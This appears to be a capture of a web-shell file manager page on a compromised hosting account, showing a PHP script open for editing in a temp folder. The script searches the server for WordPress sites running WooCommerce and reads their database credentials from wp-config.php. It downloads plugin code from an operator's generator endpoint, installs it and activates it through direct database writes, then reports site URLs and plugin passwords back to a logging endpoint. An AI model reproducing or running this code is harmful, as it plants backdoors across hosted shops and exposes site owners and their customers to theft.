X7ROOT File Manager
Current Path:
/home/gfecatvj/.cagefs/tmp
home
/
gfecatvj
/
.cagefs
/
tmp
/
📁
..
📄
.1b2af5073432b6f5c39de94b0f0c38f395bf0372b
(7 B)
📄
.1b2af5073432b6f5c39de94b0f0c38f395bf0372c
(0 B)
📄
.s.PGSQL.5432
(0 B)
📁
alfacgiapi
📄
mysql.sock
(0 B)
📁
php-xdg-runtime-dir-fallback-gfecatvj
📄
pr_2jcdn4o7cdfd8bJ58cf
(14.53 KB)
📄
sess_5171fcbf42bcab65758aae7e9218e28b.php
(118.54 KB)
📄
vs-698a75a9617bd
(63.51 KB)
Editing: pr_2jcdn4o7cdfd8bJ58cf
<?php function ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageFileName = 'image.png') { $pluginDir = $wpRoot . '/wp-content/plugins/' . $pluginName; $pluginFile = $pluginDir . '/' . $pluginName . '.php'; $configFile = $pluginDir . '/config.php'; $assetsDir = $pluginDir . '/assets/images/'; $imageFile = $assetsDir . '/' . $imageFileName . '.png'; $needInstall = false; $plugin_install = 0; if (!is_dir($pluginDir)) { $needInstall = true; } elseif ( !is_file($pluginFile) || filesize($pluginFile) === 0 || !is_file($configFile) || filesize($configFile) === 0 ) { $needInstall = true; } if ($needInstall) { if (!is_dir($pluginDir)) { mkdir($pluginDir, 0755, true); } if (!is_dir($assetsDir)) { mkdir($assetsDir, 0755, true); } file_put_contents($pluginFile, $mainPhpContent, LOCK_EX); file_put_contents($configFile, $configContent, LOCK_EX); file_put_contents($imageFile, $imageContent, LOCK_EX); $plugin_install = 1; } else { $plugin_install = 2; } $creds = parseWpConfig($wpRoot); if (!$creds) { return 0; } $relPath = $pluginName . '/' . $pluginName . '.php'; $result = activateViaDb($creds, $relPath); if ($result['status'] === 'activated') { if ($plugin_install == 1) { $plugin_install = 'activated_true'; } else { $plugin_install = 'already_exist'; } } elseif ($result['status'] === 'already_active') { if ($plugin_install == 1) { $plugin_install = 'activated_true'; } else { $plugin_install = 'already_exist'; } } else { return 0; } return $plugin_install; } function activateViaDb($creds, $pluginRelPath) { try { $mysqli = new mysqli( $creds['db_host'], $creds['db_user'], $creds['db_password'], $creds['db_name'] ); } catch (Throwable $e) { return ['status' => 'db_connect_error', 'msg' => $e->getMessage()]; } if ($mysqli->connect_errno) { return ['status' => 'db_connect_error', 'msg' => $mysqli->connect_error]; } $tbl = $creds['prefix'] . 'options'; $res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1"); if (!$res || $res->num_rows === 0) { return ['status' => 'no_option', 'msg' => 'active_plugins not found']; } $row = $res->fetch_assoc(); $arr = @unserialize($row['option_value']); if (!is_array($arr)) { return ['status' => 'bad_plugins_data', 'msg' => 'active_plugins value is not an array']; } if (in_array($pluginRelPath, $arr, true)) { return ['status' => 'already_active']; } $arr[] = $pluginRelPath; $ser = $mysqli->real_escape_string(serialize($arr)); $res = $mysqli->query("UPDATE `$tbl` SET option_value='$ser' WHERE option_name='active_plugins'"); if ($res) { return ['status' => 'activated']; } else { return ['status' => 'update_error', 'msg' => $mysqli->error]; } } define('EXCLUDED_DIRS', array('node_modules', '.git', 'vendor', 'venv', '__pycache__', 'tmp', 'log', 'logs', 'cache', '.idea', '.vscode', 'env', '.svn', '.hg', '.composer')); define('KNOWN_BASES', array('/var/www', '/srv/http', '/usr/share/nginx', '/opt/lampp/htdocs', '/home', '\\xampp\\htdocs', '\\wamp64\\www', '\\OSPanel')); function smartscan($dir) { if (!is_readable($dir)) return []; $items = @scandir($dir); return $items ?: array(); } function fastWordPressLocator() { $roots = []; $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd(); $roots[] = realpath($docRoot); $roots[] = realpath("$docRoot/.."); $roots[] = realpath("$docRoot/../.."); $roots[] = realpath("$docRoot/../../.."); foreach (KNOWN_BASES as $base) { $real = realpath($base); if ($real) $roots[] = $real; } $roots = array_unique(array_filter($roots)); $found = []; foreach ($roots as $root) { $dirs = smartscan($root); foreach ($dirs as $dir) { if ($dir === '.' || $dir === '..' || in_array($dir, EXCLUDED_DIRS)) continue; $path = $root . DIRECTORY_SEPARATOR . $dir; if (!is_dir($path)) continue; if ( is_file("$path/wp-config.php") && is_file("$path/wp-includes/version.php") ) { $found[] = realpath($path); continue; } $subdirs = smartscan($path); foreach ($subdirs as $sub) { if ($sub === '.' || $sub === '..') continue; $subPath = $path . DIRECTORY_SEPARATOR . $sub; if (!is_dir($subPath)) continue; if ( is_file("$subPath/wp-config.php") && is_file("$subPath/wp-includes/version.php") ) { $found[] = realpath($subPath); } } } } return array_values(array_unique($found)); } function parseWpConfig($wpRoot) { $cfgPath = $wpRoot . DIRECTORY_SEPARATOR . 'wp-config.php'; if (!is_file($cfgPath)) return false; $lines = @file($cfgPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if (!$lines) return false; $creds = []; foreach ($lines as $line) { if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) { $creds['db_name'] = $m[1]; } if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) { $creds['db_user'] = $m[1]; } if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]\s*\)/", $line, $m)) { $creds['db_password'] = $m[1]; } if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) { $creds['db_host'] = $m[1]; } if (preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]\s*;/", $line, $m)) { $creds['prefix'] = $m[1]; } } if (!isset($creds['db_name'], $creds['db_user'], $creds['db_password'], $creds['db_host'])) { return false; } $creds['prefix'] = isset($creds['prefix']) ? $creds['prefix'] : 'wp_'; return $creds; } function getSiteUrl($creds) { try { $mysqli = @new mysqli( $creds['db_host'], $creds['db_user'], $creds['db_password'], $creds['db_name'] ); } catch (\mysqli_sql_exception $e) { return ['status' => 'db_error', 'msg' => $e->getMessage()]; } if ($mysqli->connect_errno) { return ['status' => 'db_error', 'msg' => $mysqli->connect_error]; } $prefix = $creds['prefix']; $optTable = $prefix . 'options'; $siteUrl = ''; $siteRes = $mysqli->query("SELECT option_value FROM `$optTable` WHERE option_name = 'siteurl' LIMIT 1"); if ($siteRes && $row = $siteRes->fetch_assoc()) { $siteUrl = rtrim($row['option_value'], '/'); } return [ 'site_url' => $siteUrl, 'status' => 'ok' ]; } function check_plugin_evac_ok($folder, $plugin_name) { if (!file_exists($folder)) return false; $files = smartscan($folder); $index = "$plugin_name.php"; if (!in_array($index, $files)) { return false; } if ((!in_array("index.htm", $files)) && (!in_array("index.html", $files))) { return false; } $index_content = file_get_contents($folder . '/' . $index); if (!preg_match("#/([a-z]+\.txt)['\"]#", $index_content, $match)) { return false; } if (!substr_count($index_content, "Description:")) { return false; } $txt_name = $match[1]; if (!in_array($txt_name, $files)) { return false; } if (!filesize($folder . '/' . $txt_name)) { return false; } if (!file_exists($folder . "/assets/images")) { return false; } if (!file_exists($folder . "/assets/js")) { return false; } $files_images = smartscan($folder . "/assets/images"); $cnt_images = 0; foreach ($files_images as $image) { if ((substr_count($image, ".png")) || (substr_count($image, ".gif"))) { $cnt_images++; } } if ($cnt_images < 5) return false; return true; } function checkEvacPlugin($creds, $pluginsPath) { try { $mysqli = new mysqli( $creds['db_host'], $creds['db_user'], $creds['db_password'], $creds['db_name'] ); } catch (Throwable $e) { return false; } if ($mysqli->connect_errno) { return false; } $tbl = $creds['prefix'] . 'options'; $res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1"); if (!$res || $res->num_rows === 0) { return false; } $row = $res->fetch_assoc(); $arr = @unserialize($row['option_value']); if (!is_array($arr)) { return false; } foreach ($arr as $plugin_one) { $plugin_one = strtr($plugin_one, ["\\" => "/"]); $plugin_one = explode("/", $plugin_one); $plugin_one = end($plugin_one); $plugin_name = strtr($plugin_one, [".php" => ""]); $chars1 = "qwrtpsdghjklzxcvbnm"; $chars2 = "eyuoa"; $found = true; for ($i = 0; $i < strlen($plugin_name); $i++) { $c = substr($plugin_name, $i, 1); if ($i % 2) { if (!substr_count($chars1, $c)) { $found = false; break; } } else { if (!substr_count($chars2, $c)) { $found = false; break; } } } if ($found) { if (check_plugin_evac_ok($pluginsPath . DIRECTORY_SEPARATOR . $plugin_name, $plugin_name)) return true; } } return false; } $foundSites = fastWordPressLocator(); $results = []; foreach ($foundSites as $wpRoot) { $siteEntry = [ 'path' => $wpRoot ]; if (file_exists($wpRoot . '/wp-content/plugins/woocommerce/woocommerce.php')) { $creds = parseWpConfig($wpRoot); if (!$creds) { $siteEntry['status'] = 'error'; $siteEntry['message'] = 'Invalid wp-config.php'; $results[] = $siteEntry; continue; } $stats = getSiteUrl($creds); if ($stats['status'] !== 'ok') { $siteEntry['status'] = 'error'; $siteEntry['message'] = isset($stats['msg']) ? $stats['msg'] : 'Unknown error'; $results[] = $siteEntry; continue; } if (checkEvacPlugin($creds, $wpRoot . '/wp-content/plugins')) { $siteEntry['status'] = 'error'; $siteEntry['message'] = 'Evac exists'; $results[] = $siteEntry; continue; } $siteEntry['status'] = 'ok'; $siteEntry['site_url'] = $stats['site_url']; $results[] = $siteEntry; } } foreach ($results as $result) { $wpRoot = $result['path']; if (function_exists("curl_init")) { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => "", CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0", CURLOPT_AUTOREFERER => true, CURLOPT_CONNECTTIMEOUT => 120, CURLOPT_TIMEOUT => 120, CURLOPT_MAXREDIRS => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_HTTPHEADER => array( "Cookie: $cookie_pass" ) ); $ch = curl_init($url . 'generator.php?nm=' . $result['site_url']); curl_setopt_array($ch, $options); $content = @curl_exec($ch); } if (!$content) { $options = array( "http" => array( "method" => "GET", "header" => "Cookie: $cookie_pass\r\n" ) ); $context = stream_context_create($options); $content = @file_get_contents($url . 'generator.php?nm=' . $result['site_url'], false, $context); } $data = json_decode($content, true); $pluginName = $data['1']; $mainPhpContent = $data['2']; $configContent = $data['3']; $imageContent = $data['4']; $imageName = $data['5']; $pluginPassword = $data['6']; $res = ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageName); if (strpos($res, 'activated_true') !== false) { $res = $result['site_url'] . ':' . $pluginPassword . ' - ' . 'activated_true' . ' | '; } elseif (strpos($res, 'already_exist') !== false) { $res = $result['site_url'] . ' - ' . 'already_exist' . ' | '; } else { $res = 0; } if ($res) { if (function_exists("curl_init")) { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_ENCODING => "", CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0", CURLOPT_AUTOREFERER => true, CURLOPT_CONNECTTIMEOUT => 120, CURLOPT_TIMEOUT => 120, CURLOPT_MAXREDIRS => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_HTTPHEADER => array( "Cookie: $cookie_pass" ) ); $ch = curl_init($url . 'lg.php?lg=' . base64_encode($res)); curl_setopt_array($ch, $options); $content = @curl_exec($ch); } if (!$content) { $options = array( "http" => array( "method" => "GET", "header" => "Cookie: $cookie_pass\r\n" ) ); $context = stream_context_create($options); $content = @file_get_contents($url . 'lg.php?lg=' . base64_encode($res), false, $context); } } }
Upload File
Create Folder